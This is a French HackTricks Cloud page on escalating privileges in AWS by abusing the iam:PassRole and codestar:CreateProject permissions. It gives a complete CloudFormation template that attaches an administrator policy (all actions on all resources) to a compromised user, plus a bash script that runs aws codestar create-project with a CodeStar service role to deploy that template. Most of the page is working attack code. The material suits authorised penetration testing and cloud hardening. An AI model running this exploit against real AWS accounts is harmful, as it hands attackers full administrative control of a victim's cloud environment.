Français - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

iam:PassRole, codestar:CreateProject

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge HackTricks AWS)!

Autres façons de soutenir HackTricks:

Avec ces autorisations, vous pouvez abuser d'un rôle IAM codestar pour effectuer des actions arbitraires via un modèle cloudformation.

Pour exploiter cela, vous devez créer un bucket S3 accessible depuis le compte attaqué. Téléchargez un fichier appelé toolchain.json. Ce fichier doit contenir l'exploit du modèle cloudformation. Le suivant peut être utilisé pour définir une stratégie gérée pour un utilisateur sous votre contrôle et lui donner des autorisations d'administrateur:

toolchain.json
{
"Resources": {
"supercodestar": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"ManagedPolicyName": "CodeStar_supercodestar",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
},
"Users": [
"<compromised username>"
]
}
}
}
}

De plus, téléchargez ce fichier zip vide dans le bucket :

N'oubliez pas que le bucket avec les deux fichiers doit être accessible par le compte victime.

Une fois les deux éléments téléchargés, vous pouvez maintenant procéder à l'exploitation en créant un projet codestar :

PROJECT_NAME="supercodestar"

# Crecte the source JSON
## In this JSON the bucket and key (path) to the empry.zip file is used
SOURCE_CODE_PATH="/tmp/surce_code.json"
SOURCE_CODE="[
{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"empty.zip\"
}
},
\"destination\": {
\"codeCommit\": {
\"name\": \"$PROJECT_NAME\"
}
}
}
]"
printf "$SOURCE_CODE" > $SOURCE_CODE_PATH

# Create the toolchain JSON
## In this JSON the bucket and key (path) to the toolchain.json file is used
TOOLCHAIN_PATH="/tmp/tool_chain.json"
TOOLCHAIN="{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"toolchain.json\"
}
},
\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
}"
printf "$TOOLCHAIN" > $TOOLCHAIN_PATH

# Create the codestar project that will use the cloudformation epxloit to privesc
aws codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME \
--source-code file://$SOURCE_CODE_PATH \
--toolchain file://$TOOLCHAIN_PATH

Cet exploit est basé sur l'exploit Pacu de ces privilèges: https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997 Sur celui-ci, vous pouvez trouver une variation pour créer une stratégie gérée par l'administrateur pour un rôle au lieu d'un utilisateur.

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Précédentcodestar:CreateProject, codestar:AssociateTeamMemberSuivantAWS - Cloudformation Privesc

Dernière mise à jour